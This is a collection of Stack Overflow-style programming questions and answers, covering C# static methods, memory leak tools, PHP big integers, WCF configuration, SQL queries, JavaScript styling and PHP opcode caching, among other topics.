[ "", "c#", "arrays", "" ]
I've been working with [providers](http://msdn.microsoft.com/en-us/library/aa479030.aspx) a fair bit lately, and I came across an interesting situation where I wanted to have an abstract class that had an `abstract static` method. I read a few posts on the topic, and it sort of made sense, but is there a nice clear explanation?
Static methods are not *instantiated* as such, they're just available without an object reference. A call to a static method is done through the class name, not through an object reference, and the Intermediate Language (IL) code to call it will call the abstract method through the name of the class that defined it, not necessarily the name of the class you used. Let me show an example. With the following code: ``` public class A { public static void Test() { } } public class B : A { } ``` If you call B.Test, like this: ``` class Program { static void Main(string[] args) { B.Test(); } } ``` Then the actual code inside the Main method is as follows: ``` .entrypoint .maxstack 8 L0000: nop L0001: call void ConsoleApplication1.A::Test() L0006: nop L0007: ret ``` As you can see, the call is made to A.Test, because it was the A class that defined it, and not to B.Test, even though you can write the code that way. If you had *class types*, like in the Delphi Programming Language, where you can make a variable referring to a type and not an object, you would have more use for virtual and thus abstract static methods (and also constructors), but they aren't available and thus static calls are non-virtual in .NET. I realize that the IL designers could allow the code to be compiled to call B.Test, and resolve the call at runtime, but it still wouldn't be virtual, as you would still have to write some kind of class name there. Virtual methods, and thus abstract ones, are only useful when you're using a variable which, at runtime, can contain many different types of objects, and you thus want to call the right method for the current object you have in the variable. With static methods you need to go through a class name anyway, so the exact method to call is known at compile time because it can't and won't change. Thus, virtual/abstract static methods are not available in .NET.
Static methods cannot be inherited or overridden, and that is why they can't be abstract. Since static methods are defined on the type, not the instance, of a class, they must be called explicitly on that type. So when you want to call a method on a child class, you need to use its name to call it. This makes inheritance irrelevant. Assume you could, for a moment, inherit static methods. Imagine this scenario: ``` public static class Base { public static virtual int GetNumber() { return 5; } } public static class Child1 : Base { public static override int GetNumber() { return 1; } } public static class Child2 : Base { public static override int GetNumber() { return 2; } } ``` If you call Base.GetNumber(), which method would be called? Which value returned? It's pretty easy to see that without creating instances of objects, inheritance is rather hard. Abstract methods without inheritance are just methods that don't have a body, so can't be called.
Why can't I have abstract static methods in C#?
[ "", "c#", ".net", "language-design", "" ]
I have a .exe and many plug-in .dll modules that the .exe loads. (I have source for both.) A cross-platform (with source) solution would be ideal, but the platform can be narrowed to WinXP and Visual Studio (7.1/2003 in my case). The built-in VS leak detector only gives the line where new/malloc was called from, but I have a wrapper for allocations, so a full symbolic stack trace would be best. The detector would also be able to detect for a leak in both the .exe and its accompanying plug-in .dll modules.
I personally use [Visual Leak Detector](https://kinddragon.github.io/vld/), though it can cause large delays when large blocks are leaked (it displays the contents of the entire leaked block).
If you don't want to recompile (as Visual Leak Detector requires) I would recommend [WinDbg](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools), which is both powerful and fast (though it's not as easy to use as one could desire). On the other hand, if you don't want to mess with WinDbg, you can take a look at [UMDH](http://msdn.microsoft.com/en-us/library/ff560206%28VS.85%29.aspx), which is also developed by Microsoft and it's easier to learn. Take a look at these links in order to learn more about WinDbg, memory leaks and memory management in general: * [Memory Leak Detection Using Windbg](http://www.codeproject.com/KB/cpp/MemoryLeak.aspx) * [Memory Leak Detection in MFC](http://msdn.microsoft.com/en-us/library/c99kz476%28VS.80%29.aspx) * [Common WinDbg Commands (Thematically Grouped)](http://windbg.info/doc/1-common-cmds.html#20_memory_heap) * [C/C++ Memory Corruption And Memory Leaks](http://www.yolinux.com/TUTORIALS/C++MemoryCorruptionAndMemoryLeaks.html) * [The Memory Management Reference](http://www.memorymanagement.org/) * [Using LeakDiag to Debug Unmanaged Memory Leaks](http://mcfunley.com/277/using-leakdiag-to-debug-unmanaged-memory-leaks) * [Heap: Pleasures and Pains](http://msdn.microsoft.com/en-us/library/ms810466.aspx)
What is the best free memory leak detector for a C/C++ program and its plug-in DLLs?
[ "", "c++", "c", "visual-studio", "memory-leaks", "" ]
Ok, so PHP isn't the best language to be dealing with arbitrarily large integers in, considering that it only natively supports 32-bit signed integers. What I'm trying to do though is create a class that could represent an arbitrarily large binary number and be able to perform simple arithmetic operations on two of them (add/subtract/multiply/divide). My target is dealing with 128-bit integers. There's a couple of approaches I'm looking at, and problems I see with them. Any input or commentary on what you would choose and how you might go about it would be greatly appreciated. **Approach #1:** Create a 128-bit integer class that stores its integer internally as four 32-bit integers. The only problem with this approach is that I'm not sure how to go about handling overflow/underflow issues when manipulating individual chunks of the two operands. **Approach #2:** Use the bcmath extension, as this looks like something it was designed to tackle. My only worry in taking this approach is the scale setting of the bcmath extension, because there can't be any rounding errors in my 128-bit integers; they must be precise. I'm also worried about being able to eventually convert the result of the bcmath functions into a binary string (which I'll later need to shove into some mcrypt encryption functions). **Approach #3:** Store the numbers as binary strings (probably LSB first). Theoretically I should be able to store integers of any arbitrary size this way. All I would have to do is write the four basic arithmetic functions to perform add/sub/mult/div on two binary strings and produce a binary string result. This is exactly the format I need to hand over to mcrypt as well, so that's an added plus. This is the approach I think has the most promise at the moment, but the one sticking point I've got is that PHP doesn't offer me any way to manipulate the individual bits (that I know of). I believe I'd have to break it up into byte-sized chunks (no pun intended), at which point my questions about handling overflow/underflow from Approach #1 apply.
The [PHP GMP extension](https://www.php.net/gmp) will be better for this. As an added bonus, you can use it to do your decimal-to-binary conversion, like so: ``` gmp_strval(gmp_init($n, 10), 2); ```
There are already various [classes](http://www.pear.php.net/package/Crypt_DiffieHellman/docs/latest/Crypt_DiffieHellman/BigInteger/Crypt_DiffieHellman_Math_BigInteger_Interface.html) [available](http://pear.php.net/package/Math_BigInteger/docs/latest/Math_BigInteger/_Math_BigInteger-1.0.0RC3---BigInteger.php.html) for this so you may wish to look at them before writing your own solution (if indeed writing your own solution is still needed).
Arithmetic with Arbitrarily Large Integers in PHP
[ "", "php", "integer", "" ]
Using C# .NET 3.5 and WCF, I'm trying to write out some of the WCF configuration in a client application (the name of the server the client is connecting to). The obvious way is to use `ConfigurationManager` to load the configuration section and write out the data I need. ``` var serviceModelSection = ConfigurationManager.GetSection("system.serviceModel"); ``` Appears to always return null. ``` var serviceModelSection = ConfigurationManager.GetSection("appSettings"); ``` Works perfectly. The configuration section is present in the App.config but for some reason `ConfigurationManager` refuses to load the `system.ServiceModel` section. I want to avoid manually loading the xxx.exe.config file and using XPath but if I have to resort to that I will. Just seems like a bit of a hack. Any suggestions?
The [`<system.serviceModel>`](http://msdn.microsoft.com/en-us/library/ms731354%28v=vs.90%29.aspx) element is for a configuration section **group**, not a section. You'll need to use [`System.ServiceModel.Configuration.ServiceModelSectionGroup.GetSectionGroup()`](http://msdn.microsoft.com/en-us/library/system.servicemodel.configuration.servicemodelsectiongroup.getsectiongroup%28v=vs.90%29.aspx) to get the whole group.
<http://mostlytech.blogspot.com/2007/11/programmatically-enumerate-wcf.html> ``` // Automagically find all client endpoints defined in app.config ClientSection clientSection = ConfigurationManager.GetSection("system.serviceModel/client") as ClientSection; ChannelEndpointElementCollection endpointCollection = clientSection.ElementInformation.Properties[string.Empty].Value as ChannelEndpointElementCollection; List<string> endpointNames = new List<string>(); foreach (ChannelEndpointElement endpointElement in endpointCollection) { endpointNames.Add(endpointElement.Name); } // use endpointNames somehow ... ``` Appears to work well.
Loading System.ServiceModel configuration section using ConfigurationManager
[ "", "c#", ".net", "xml", "wcf", "configurationmanager", "" ]
I am trying to implement string unescaping with Python regex and backreferences, and it doesn't seem to want to work very well. I'm sure it's something I'm doing wrong but I can't figure out what... ``` >>> import re >>> mystring = r"This is \n a test \r" >>> p = re.compile( "\\\\(\\S)" ) >>> p.sub( "\\1", mystring ) 'This is n a test r' >>> p.sub( "\\\\\\1", mystring ) 'This is \\n a test \\r' >>> p.sub( "\\\\1", mystring ) 'This is \\1 a test \\1' ``` I'd like to replace \\[char] with \[char], but backreferences in Python don't appear to follow the same rules they do in every other implementation I've ever used. Could someone shed some light?
Isn't that what Anders' second example does? In 2.5 there's also a `string-escape` encoding you can apply: ``` >>> mystring = r"This is \n a test \r" >>> mystring.decode('string-escape') 'This is \n a test \r' >>> print mystring.decode('string-escape') This is a test >>> ```
Well, I think you might have missed the r or miscounted the backslashes... ``` "\\n" == r"\n" >>> import re >>> mystring = r"This is \\n a test \\r" >>> p = re.compile( r"[\\][\\](.)" ) >>> print p.sub( r"\\\1", mystring ) This is \n a test \r >>> ``` Which, if I understood is what was requested. I suspect the more common request is this: ``` >>> d = {'n':'\n', 'r':'\r', 'f':'\f'} >>> p = re.compile(r"[\\]([nrfv])") >>> print p.sub(lambda mo: d[mo.group(1)], mystring) This is \ a test \ >>> ``` The interested student should also read Ken Thompson's [Reflections on Trusting Trust"](http://cm.bell-labs.com/who/ken/trust.html), wherein our hero uses a similar example to explain the perils of trusting compilers you haven't bootstrapped from machine code yourself.
Python Regular Expressions to implement string unescaping
[ "", "python", "regex", "backreference", "" ]
At work we are currently still using JUnit 3 to run our tests. We have been considering switching over to JUnit 4 for **new** tests being written but I have been keeping an eye on TestNG for a while now. What experiences have you all had with either JUnit 4 or TestNG, and which seems to work better for very large numbers of tests? Having flexibility in writing tests is also important to us since our functional tests cover a wide aspect and need to be written in a variety of ways to get results. Old tests will not be re-written as they do their job just fine. What I would like to see in new tests though is flexibility in the way the test can be written, natural assertions, grouping, and easily distributed test executions.
I've used both, but I have to agree with Justin Standard that you shouldn't really consider rewriting your existing tests to any new format. Regardless of the decision, it is pretty trivial to run both. TestNG strives to be much more configurable than JUnit, but in the end they both work equally well. TestNG has a neat feature where you can mark tests as a particular group, and then easily run all tests of a specific group, or exclude tests of a particular group. Thus you can mark tests that run slowly as in the "slow" group and then ignore them when you want quick results. A suggestion from their documentation is to mark some subset as "checkin" tests which should be run whenever you check new files in. I never saw such a feature in JUnit, but then again, if you don't have it, you don't REALLY miss it. For all its claims of high configuration, I did run into a corner case the a couple weeks ago where I couldn't do what I wanted to do... I wish I could remember what it is, but I wanted to bring it up so you know that it's not perfect. The biggest advantage TestNG has is annotations... which JUnit added in version 4 anyways.
First I would say, don't rewrite all your tests just to suit the latest fad. Junit3 works perfectly well, and the introduction of annotations in 4 doesn't buy you very much (in my opinion). It is much more important that you guys *write* tests, and it sounds like you do. Use whatever seems most natural and helps you get your work done. I can't comment on TestNG b/c I haven't used it. But I would recommend [unitils](http://www.unitils.org/summary.html), a great wrapper for JUnit/TestNG/DBUnit/EasyMock, regardless of which route you take. (It supports all the flavors mentioned above)
JUnit vs TestNG
[ "", "java", "testing", "junit", "testng", "" ]
My job would be easier, or at least less tedious if I could come up with an automated way (preferably in a Python script) to extract useful information from a FileMaker Pro database. I am working on Linux machine and the FileMaker database is on the same LAN running on an OS X machine. I can log into the webby interface from my machine. I'm quite handy with SQL, and if somebody could point me to some FileMaker plug-in that could give me SQL access to the data within FileMaker, I would be pleased as punch. Everything I've found only goes the other way: Having FileMaker get data from SQL sources. Not useful. It's not my first choice, but I'd use Perl instead of Python if there was a Perl-y solution at hand. *Note*: XML/XSLT services (as suggested by some folks) are only available on FM Server, not FM Pro. Otherwise, that would probably be the best solution. ODBC is turning out to be extremely difficult to even get working. There is absolutely zero feedback from FM when you set it up so you have to dig through /var/log/system.log and parse obscure error messages. *Conclusion*: I got it working by running a python script locally on the machine that queries the FM database through the ODBC connections. The script is actually a TCPServer that accepts socket connections from other systems on the LAN, runs the queries, and returns the data through the socket connection. I had to do this to bypass the fact that FM Pro only accepts ODBC connections locally (FM server is required for external connections).
It has been a **really** long time since I did anything with FileMaker Pro, but I know that it does have capabilities for an ODBC (and JDBC) connection to be made to it (however, I don't know how, or if, that translates to the linux/perl/python world though). This article shows how to share/expose your FileMaker data via ODBC & JDBC: [Sharing FileMaker Pro data via ODBC or JDBC](http://www.filemaker.com/help/15-Using%20ODBC2.html) From there, if you're able to create an ODBC/JDBC connection you could query out data as needed.
You'll need the FileMaker Pro installation CD to get the drivers. [This document](http://www.filemaker.com/downloads/pdf/fm9_odbc_jdbc_guide_en.pdf) details the process for FMP 9 - it is similar for versions 7.x and 8.x as well. Versions 6.x and earlier are completely different and I wouldn't bother trying (xDBC support in those previous versions is "minimal" at best). FMP 9 supports SQL-92 standard syntax (mostly). Note that rather than querying tables directly you query using the "table occurrence" name which serves as a table alias of sorts. If the data tables are stored in multiple files it is possible to create a single FMP file with table occurrences/aliases pointing to those data tables. There's an "undocumented feature" where such a file must have a table defined in it as well and that table "related" to any other table on the relationships graph (doesn't matter which one) for ODBC access to work. Otherwise your queries will always return no results. The PDF document details all of the limitations of using the xDBC interface FMP provides. Performance of simple queries is reasonably fast, ymmv. I have found the performance of queries specifying the "LIKE" operator to be less than stellar. FMP also has an XML/XSLT interface that you can use to query FMP data over an HTTP connection. It also provides a PHP class for accessing and using FMP data in web applications.
Best way to extract data from a FileMaker Pro database in a script?
[ "", "python", "linux", "perl", "scripting", "filemaker", "" ]
Let's say I have four tables: `PAGE`, `USER`, `TAG`, and `PAGE-TAG`: ``` Table | Fields ------------------------------------------ PAGE | ID, CONTENT TAG | ID, NAME USER | ID, NAME PAGE-TAG | ID, PAGE-ID, TAG-ID, USER-ID ``` And let's say I have four pages: ``` PAGE#1 'Content page 1' tagged with tag#1 by user1, tagged with tag#1 by user2 PAGE#2 'Content page 2' tagged with tag#3 by user2, tagged by tag#1 by user2, tagged by tag#8 by user1 PAGE#3 'Content page 3' tagged with tag#7 by user#1 PAGE#4 'Content page 4' tagged with tag#1 by user1, tagged with tag#8 by user1 ``` I expect my query to look something like this: ``` select page.content ? from page, page-tag where page.id = page-tag.pag-id and page-tag.tag-id in (1, 3, 8) order by ? desc ``` I would like to get output like this: ``` Content page 2, 3 Content page 4, 2 Content page 1, 1 ``` --- Quoting Neall > Your question is a bit confusing. Do you want to get the number of times each page has been tagged? No > The number of times each page has gotten each tag? No > The number of unique users that have tagged a page? No > The number of unique users that have tagged each page with each tag? No I want to know how many of the passed tags appear in a particular page, not just if any of the tags appear. SQL IN works like an boolean operator OR. If a page was tagged with any value within the IN Clause then it returns true. I would like to know how many of the values inside of the IN clause return true. Below i show, the output i expect: ``` page 1 | in (1,2) -> 1 page 1 | in (1,2,3) -> 1 page 1 | in (1) -> 1 page 1 | in (1,3,8) -> 1 page 2 | in (1,2) -> 1 page 2 | in (1,2,3) -> 2 page 2 | in (1) -> 1 page 2 | in (1,3,8) -> 3 page 4 | in (1,2,3) -> 1 page 4 | in (1,2,3) -> 1 page 4 | in (1) -> 1 page 4 | in (1,3,8) -> 2 ``` This will be the content of the page-tag table i mentioned before: ``` id page-id tag-id user-id 1 1 1 1 2 1 1 2 3 2 3 2 4 2 1 2 5 2 8 1 6 3 7 1 7 4 1 1 8 4 8 1 ``` **@Kristof** does not exactly what i am searching for but thanks anyway. **@Daren** If i execute you code i get the next error: ``` #1054 - Unknown column 'page-tag.tag-id' in 'having clause' ``` **@Eduardo Molteni** Your answer does not give the output in the question but: ``` Content page 2 8 Content page 4 8 content page 2 3 content page 1 1 content page 1 1 content page 2 1 cotnent page 4 1 ``` **@Keith** I am using plain SQL not T-SQL and i am not familiar with T-SQL, so i do not know how your query translate to plain SQL. Any more ideas?
OK, so the key difference between this and kristof's answer is that you only want a count of 1 to show against page 1, because it has been tagged only with one tag from the set (even though two separate users both tagged it). I would suggest this: ``` SELECT page.ID, page.content, count(*) AS uniquetags FROM ( SELECT DISTINCT page.content, page.ID, page-tag.tag-id FROM page INNER JOIN page-tag ON page.ID=page-tag.page-ID WHERE page-tag.tag-id IN (1, 3, 8) ) GROUP BY page.ID ``` I don't have a SQL Server installation to check this, so apologies if there's a syntax mistake. But semantically I think this is what you need. This may not give the output in descending order of number of tags, but try adding: ``` ORDER BY uniquetags DESC ``` at the end. My uncertainty is whether you can use `ORDER BY` outside of grouping in SQL Server. If not, then you may need to nest the whole thing in another `SELECT`.
This might work: ``` select page.content, count(page-tag.tag-id) as tagcount from page inner join page-tag on page-tag.page-id = page.id group by page.content having page-tag.tag-id in (1, 3, 8) ```
How can I get the number of occurrences in a SQL IN clause?
[ "", "sql", "" ]
I have a recursive algorithm which steps through a string, character by character, and parses it to create a tree-like structure. I want to be able to keep track of the character index the parser is currently at (for error messages as much as anything else) but am not keen on implementing something like a tuple to handle multiple returned types. I tried using an Integer type, declared outside the method and passed into the recursive method, but because it's final, recursive call increments are "forgotten" when I return. (Because the increment of the Integer value makes the passed-by-value object reference point at a new object) Is there a way to get something similar to work which won't pollute my code?
Since you've already discovered the pseudo-mutable integer "hack," how about this option: Does it make sense for you to make a separate Parser class? If you do this, you can store the current state in a member variable. You probably need to think about how you're going to handle any thread safety issues, and it might be overkill for this particular application, but it might work for you.
It's kind of a hack, but sometimes I use an AtomicInteger, which is mutable, to do things like this. I've also seen cases where an int[] of size 1 is passed in.
How to keep a "things done" count in a recursive algorithm in Java?
[ "", "java", "recursion", "coding-style", "integer", "final", "" ]
I'm using `ByteBuffers` and `FileChannels` to write binary data to a file. When doing that for big files or successively for multiple files, I get an `OutOfMemoryError` exception. I've read elsewhere that using `Bytebuffers` with NIO is broken and should be avoided. Does any of you already faced this kind of problem and found a solution to efficiently save large amounts of binary data in a file in java? Is the jvm option `-XX:MaxDirectMemorySize` the way to go?
I would say don't create a huge ByteBuffer that contains ALL of the data at once. Create a much smaller ByteBuffer, fill it with data, then write this data to the FileChannel. Then reset the ByteBuffer and continue until all the data is written.
Check out Java's **[Mapped Byte Buffers](http://java.sun.com/j2se/1.4.2/docs/api/java/nio/MappedByteBuffer.html)**, also known as 'direct buffers'. Basically, this mechanism uses the OS's virtual memory paging system to 'map' your buffer directly to disk. The OS will manage moving the bytes to/from disk and memory auto-magically, very quickly, and you won't have to worry about changing your virtual machine options. This will also allow you to take advantage of NIO's improved performance over traditional java stream-based i/o, without any weird hacks. The only two catches that I can think of are: 1. On 32-bit system, you are limited to just under 4GB *total for all mapped byte buffers*. (That is actually a limit for my application, and I now run on 64-bit architectures.) 2. Implementation is JVM specific and not a requirement. I use Sun's JVM and there are no problems, but YMMV. Kirk Pepperdine (a somewhat famous Java performance guru) is involved with a website, www.JavaPerformanceTuning.com, that has some more MBB details: **[NIO Performance Tips](http://www.javaperformancetuning.com/tips/nio.shtml#REF1)**
How to avoid OutOfMemoryError when using Bytebuffers and NIO?
[ "", "java", "nio", "bytebuffer", "filechannel", "" ]
What is the simplest SQL query to find the second largest integer value in a specific column? There are maybe duplicate values in the column.
``` SELECT MAX( col ) FROM table WHERE col < ( SELECT MAX( col ) FROM table ) ```
``` SELECT MAX(col) FROM table WHERE col NOT IN ( SELECT MAX(col) FROM table ); ```
What is the simplest SQL Query to find the second largest value?
[ "", "sql", "puzzle", "" ]
I'm aware of things like `onchange`, `onmousedown` and `onmouseup` but is there a good reference somewhere that lists all of them complete with possibly a list of the elements that they cover?
W3Schools seems to have a good Javascript events reference: [HTML DOM Events](http://www.w3schools.com/jsref/dom_obj_event.asp)
Quirksmode has a nice [event-compatibility table](http://quirksmode.org/dom/events/index.html) and an [introduction](http://quirksmode.org/js/introevents.html).
Reference that lists available JavaScript events?
[ "", "javascript", "browser", "client-side", "" ]
I'm looking for any way that I can improve the selector performance of a jQuery call. Specifically things like this: Is `$("div.myclass")` faster than `$(".myclass")` I would think it might be, but I don't know if jQuery is smart enough to limit the search by tag name first, etc. Anyone have any ideas for how to formulate a jQuery selector string for best performance?
There is no doubt that **filtering by tag name first is much faster** than filtering by classname. This will be the case until all browsers implement getElementsByClassName natively, as is the case with getElementsByTagName.
In some cases, you can speed up a query by limiting its context. If you have an element reference, you can pass it as the second argument to limit the scope of the query: ``` $(".myclass", a_DOM_element); ``` should be faster than ``` $(".myclass"); ``` if you already have a\_DOM\_element and it's significantly smaller than the whole document.
Good ways to improve jQuery selector performance?
[ "", "javascript", "jquery", "performance", "css-selectors", "" ]
If I have a ``` <input id="uploadFile" type="file" /> ``` tag, and a submit button, how do I determine, in IE6 (and above) if a file has been selected by the user. In FF, I just do: ``` var selected = document.getElementById("uploadBox").files.length > 0; ``` But that doesn't work in IE.
This works in IE (and FF, I believe): ``` if(document.getElementById("uploadBox").value != "") { // you have a file } ```
``` var nme = document.getElementById("uploadFile"); if(nme.value.length < 4) { alert('Must Select any of your photo for upload!'); nme.focus(); return false; } ```
How to determine if user selected a file for file upload?
[ "", "javascript", "html", "upload", "" ]
I have an Interface called `IStep` that can do some computation (See "[Execution in the Kingdom of Nouns](http://steve-yegge.blogspot.com/2006/03/execution-in-kingdom-of-nouns.html)"). At runtime, I want to select the appropriate implementation by class name. ``` // use like this: IStep step = GetStep(sName); ```
Your question is very confusing... If you want to find types that implement IStep, then do this: ``` foreach (Type t in Assembly.GetCallingAssembly().GetTypes()) { if (!typeof(IStep).IsAssignableFrom(t)) continue; Console.WriteLine(t.FullName + " implements " + typeof(IStep).FullName); } ``` If you know already the name of the required type, just do this ``` IStep step = (IStep)Activator.CreateInstance(Type.GetType("MyNamespace.MyType")); ```
If the implementation has a parameterless constructor, you can do this using the System.Activator class. You will need to specify the assembly name in addition to the class name: ``` IStep step = System.Activator.CreateInstance(sAssemblyName, sClassName).Unwrap() as IStep; ``` <http://msdn.microsoft.com/en-us/library/system.activator.createinstance.aspx>
How to find an implementation of a C# interface in the current assembly with a specific name?
[ "", "c#", "linq", "reflection", "linq-to-objects", "" ]
This error just started popping up all over our site. ***Permission denied to call method to Location.toString*** I'm seeing google posts that suggest that this is related to flash and our crossdomain.xml. What caused this to occur and how do you fix?
Are you using javascript to communicate between frames/iframes which point to different domains? This is not permitted by the JS "same origin/domain" security policy. Ie, if you have ``` <iframe name="foo" src="foo.com/script.js"> <iframe name="bar" src="bar.com/script.js"> ``` And the script on bar.com tries to access `window["foo"].Location.toString`, you will get this (or similar) exceptions. Please also note that the same origin policy can also kick in if you have content from different subdomains. [Here](http://www.mozilla.org/projects/security/components/same-origin.html) you can find a short and to the point explanation of it with examples.
You may have come across [this posting](http://willperone.net/Code/as3error.php), but it appears that a flash security update changed the behaviour of the crossdomain.xml, requiring you to specify a security policy to allow arbitrary headers to be sent from a remote domain. The Adobe knowledge base article (also referenced in the original post) is [here](http://kb.adobe.com/selfservice/viewContent.do?externalId=kb403185&sliceId=2).
What does this javascript error mean? Permission denied to call method to Location.toString
[ "", "javascript", "flash", "" ]
I am trying to snoop on a log file that an application is writing to. I have successfully hooked createfile with the detours library from MSR, but createfile never seems to be called with file I am interested in snooping on. I have also tried hooking openfile with the same results. I am not an experienced Windows/C++ programmer, so my initial two thoughts were either that the application calls createfile before I hook the apis, or that there is some other API for creating files/obtaining handles for them.
You can use Sysinternal's [FileMon](http://technet.microsoft.com/en-us/sysinternals/bb896642.aspx). It is an excellent monitor that can tell you exactly which file-related system calls are being made and what are the parameters. I think that this approach is much easier than hooking API calls and much less intrusive.
Here's a link which might be of use: [Guerilla-Style File Monitoring with C# and C++](http://www.codingthewheel.com/archives/how-i-built-a-working-online-poker-bot-6) It is possible to create a file without touching CreateFile API but can I ask **what DLL injection method you're using**? If you're using something like Windows Hooks your DLL won't be installed until sometime after the target application initializes and you'll miss early calls to CreateFile. Whereas if you're using something like DetourCreateProcessWithDll your CreateFile hook can be installed prior to any of the application startup code running. In my experience 99.9% of created/opened files result in a call to CreateFile, including files opened through C and C++ libs, third-party libs, etc. Maybe there are some undocumented DDK functions which don't route through CreateFile, but for a typical log file, I doubt it.
Any Windows APIs to get file handles besides createfile and openfile?
[ "", "c++", "windows", "api", "logfile", "" ]
I need to set the height of every textbox on my form, some of which are nested within other controls. I thought I could do something like this: ``` private static IEnumerator<TextBox> FindTextBoxes(Control rootControl) { foreach (Control control in rootControl.Controls) { if (control.Controls.Count > 0) { // Recursively search for any TextBoxes within each child control foreach (TextBox textBox in FindTextBoxes(control)) { yield return textBox; } } TextBox textBox2 = control as TextBox; if (textBox2 != null) { yield return textBox2; } } } ``` Using it like this: ``` foreach(TextBox textBox in FindTextBoxes(this)) { textBox.Height = height; } ``` But of course the compiler spits its dummy, because *foreach* expects an **IEnumerable** rather than an **IEnumerator**. Is there a way to do this without having to create a separate class with a **GetEnumerator()** method?
As the compiler is telling you, you need to change your return type to IEnumerable. That is how the yield return syntax works.
Just to clarify ``` private static IEnumerator<TextBox> FindTextBoxes(Control rootControl) ``` Changes to ``` private static IEnumerable<TextBox> FindTextBoxes(Control rootControl) ``` That should be all :-)
Can I have a method returning IEnumerator<T> and use it in a foreach loop?
[ "", "c#", "foreach", "ienumerable", "ienumerator", "" ]
Have you used VS.NET Architect Edition's Application and System diagrams to start designing a solution? If so, did you find it useful? Did the "automatic implementation" feature work ok?
I used to use it a lot. This designer worked good for stubbing out prototype projects, but ultimately I found myself wasting a lot of time moving the mouse around when I could be typing. It seemed like an awesome idea to be able to print out the class diagrams to show APIs to other developers while I was prototyping, but it proved quite limiting and it looks awful on a non-color printer. Now I just use the text editor and some [AutoHotkey](http://www.autohotkey.com) macros to get everything done.
Yes, and no, it's not very useful in my opinion. It's not very stable, it's easy to get out of sync, and the "look how fast I generate this" advantage is virtually nil when compared to more mundane things such as code snippets. Then again, I am a total "Architect" luddite, so take this with a grain of salt.
VS.NET Application Diagrams
[ "", "c#", ".net", "visual-studio", "architecture", "diagram", "" ]
I have always thought that the .equals() method in java should be overridden to be made specific to the class you have created. In other words to look for equivalence of two different instances rather than two references to the same instance. However I have encountered other programmers who seem to think that the default object behavior should be left alone and a new method created for testing equivalence of two objects of the same class. What are the argument for and against overriding the equals method?
Overriding the equals method is necessary if you want to test equivalence in standard library classes (for example, ensuring a java.util.Set contains unique elements or using objects as keys in java.util.Map objects). Note, if you override equals, ensure you honour the API contract as described in the documentation. For example, ensure you also override [Object.hashCode](http://java.sun.com/j2se/1.3/docs/api/java/lang/Object.html): > If two objects are equal according to > the equals(Object) method, then > calling the hashCode method on each of > the two objects must produce the same > integer result. EDIT: I didn't post this as a complete answer on the subject, so I'll echo Fredrik Kalseth's statement that overriding equals works best for [immutable objects](http://en.wikipedia.org/wiki/Immutable_object). To quote the API for [Map](http://java.sun.com/j2se/1.4.2/docs/api/java/util/Map.html): > Note: great care must be exercised if > mutable objects are used as map keys. > The behavior of a map is not specified > if the value of an object is changed > in a manner that affects equals > comparisons while the object is a key > in the map.
I would highly recommend picking up a copy of Effective Java and reading through item 7 obeying the [equals contract](http://java.sun.com/j2se/1.5.0/docs/api/java/lang/Object.html). You need to be careful if you are overriding equals for mutable objects, as many of the collections such as Maps and Sets use equals to determine equivalence, and mutating an object contained in a collection could lead to unexpected results. Brian Goetz also has a pretty good [overview of implementing equals and hashCode](http://www.ibm.com/developerworks/java/library/j-jtp05273.html).
Overriding the equals method vs creating a new method
[ "", "java", "oop", "" ]
What I have so far is ``` #!/bin/sh php_syntax_check() { retval=0 for i in $(git-diff-index --name-only --cached HEAD -- | grep -e '\.php$'); do if [ -f $i ]; then output=$(php -l $i) retval=$? if [ $retval -gt 0 ]; then echo "==============================================================================" echo "Unstaging $i for the commit due to the follow parse errors" echo "$output" git reset -q HEAD $i fi fi done if [ $retval -gt 0 ]; then exit $retval fi } php_syntax_check ```
If the commit is a partial commit (not all the changes in the working tree are committed), then this make give incorrect results since it tests the working copy and not the staged copy. One way to do this could be: ``` git diff --cached --name-only --diff-filter=ACMR | xargs git checkout-index --prefix=$TMPDIR/ -- find $TMPDIR -name '*.php' -print | xargs -n 1 php -l ``` Which would make a copy of the staged images into a scratch space and then run the test command on them there. If any of the files include other files in the build then you may have to recreate the whole staged image in the test tree and then test the changed files there (See: [Git pre-commit hook : changed/added files](https://stackoverflow.com/questions/2412450/git-pre-commit-hook-changed-added-files/3068990#3068990)).
I'm sorry if it's offtopic, but aren't you supposed to run some kind of automated tests (which would imply that the code has no syntax errors) before doing a commit?
Is there a better way of writing a git pre-commit hook to check any php file in a commit for parse errors?
[ "", "php", "git", "version-control", "" ]
How can I set the background color of an HTML element using css in JavaScript?
In general, CSS properties are converted to JavaScript by making them camelCase without any dashes. So `background-color` becomes `backgroundColor`. ``` function setColor(element, color) { element.style.backgroundColor = color; } // where el is the concerned element var el = document.getElementById('elementId'); setColor(el, 'green'); ```
You might find your code is more maintainable if you keep all your styles, etc. in CSS and just set / unset class names in JavaScript. Your CSS would obviously be something like: ``` .highlight { background:#ff00aa; } ``` Then in JavaScript: ``` element.className = element.className === 'highlight' ? '' : 'highlight'; ```
How to set background color of HTML element using css properties in JavaScript
[ "", "javascript", "css", "background-color", "" ]
I'm trying to improve performance under high load and would like to implement opcode caching. Which of the following should I use? * APC - [Installation Guide](http://www.howtoforge.com/apc-php5-apache2-debian-etch) * eAccelerator - [Installation Guide](http://www.howtoforge.com/eaccelerator_php5_debian_etch) * XCache - [Installation Guide](http://www.howtoforge.com/xcache-php5-apache2-debian-etch) I'm also open to any other alternatives that have slipped under my radar. Currently running on a stock Debian Etch with Apache 2 and PHP 5.2 **[Update 1]** HowtoForge installation links added **[Update 2]** Based on the answers and feedback given, I have tested all 3 implementations using the following Apache JMeter test plan on my application: * Login * Access Home Page With 50 concurrent connections, the results are as follows: No Opcode Caching ![No Opcode Caching](https://i.stack.imgur.com/ueCBW.jpg) APC ![APC](https://i.stack.imgur.com/ggqC8.jpg) eAccelerator ![eAccelerator](https://i.stack.imgur.com/puxe5.jpg) XCache ![XCache](https://i.stack.imgur.com/GybYH.jpg) Performance Graph (smaller is better) ![Performance Graph](https://i.stack.imgur.com/oXTe9.png) From the above results, eAccelerator has a slight edge in performance compared to APC and XCache. However, what matters most from the above data is that any sort of opcode caching gives a tremendous boost in performance. I have decided to use APC due to the following 2 reasons: * Package is available in official Debian repository * More functional control panel To summarize my experience: Ease of Installation: APC > eAccelerator > XCache Performance: eAccelerator > APC, XCache Control Panel: APC > XCache > eAccelerator
